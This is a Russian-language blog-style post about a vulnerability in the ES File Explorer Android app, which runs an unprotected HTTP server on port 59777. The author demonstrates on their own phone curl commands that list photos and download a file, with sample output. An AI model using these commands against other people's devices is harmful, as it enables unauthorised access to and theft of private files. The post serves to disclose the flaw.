Бэкдор в ES File Explorer File Manager, позволяющий скачать любой файл из твоего телефона

Недавно нашли бэкдор в ES File Manager, приложение просто создало http сервер не защищённый паролем на порту 59777, который позволяет получить список всех файлов, приложений, скачать файлы, запустить любое из установленных приложений и многое другое, ES File Manager об этом, естественно, никак не предупреждает пользователя. Таким образом, чувак из той же сети(например в маке) может получить доступ ко всем вашим файлам.

Вот тут сделали скрипт для работы с сервером https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

Я скрипт не запускал, а воспользовался curl’ом

Пишем:

> CURL --HEADER "CONTENT-TYPE: APPLICATION/JSON" -X POST HTTP://192.168.1.3:59777/ --DATA '{"COMMAND":"LISTPICS"}'

 

Где 192.168.1.3 — IP моего телефона в сети. Получаем список всех фоток на телефоне:

[

{"NAME":"IMG_20180802_192056_HHT.JPG", "TIME":"8/2/18 08:20:56 PM", "LOCATION":"/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_20180802_192056_HHT.JPG", "SIZE":"1.64 MB (1,720,783 BYTES)", },

{"NAME":"IMG_20180728_160906.JPG", "TIME":"8/2/18 08:22:02 PM", "LOCATION":"/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_20180728_160906.JPG", "SIZE":"4.69 MB (4,914,234 BYTES)", },

{"NAME":"IMG_20180801_120928.JPG", "TIME":"8/2/18 08:22:02 PM", "LOCATION":"/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_20180801_120928.JPG", "SIZE":"5.68 MB (5,951,479 BYTES)", },

{"NAME":"IMG_20180728_132235.JPG", "TIME":"8/2/18 08:22:04 PM", "LOCATION":"/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_20180728_132235.JPG", "SIZE":"4.94 MB (5,176,983 BYTES)", },

{"NAME":"IMG_20180728_155557.JPG", "TIME":"8/2/18 08:22:04 PM", "LOCATION":"/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_20180728_155557.JPG", "SIZE":"4.08 MB (4,275,890 BYTES)", },

{"NAME":"IMG_20180730_103456.JPG", "TIME":"8/2/18 08:22:04 PM", "LOCATION":"/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_20180730_103456.JPG", "SIZE":"3.60 MB (3,776,144 BYTES)", },

 

Скачивать вот так:

> CURL --HEADER "CONTENT-TYPE: APPLICATION/JSON" HTTP://192.168.1.3:59777/STORAGE/2C7B-180C/DCIM/CAMERA/IMG_2... > /TMP/PIC.JPG